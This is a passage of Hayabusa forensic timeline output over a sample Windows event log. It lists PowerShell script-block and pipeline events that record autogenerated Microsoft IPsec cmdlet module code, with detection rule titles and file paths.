$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent 
= $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.562 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 
10:19:38.565 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.566 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.566 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.567 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.567 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.568 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.568 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 
+00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodPa",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] 
$script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 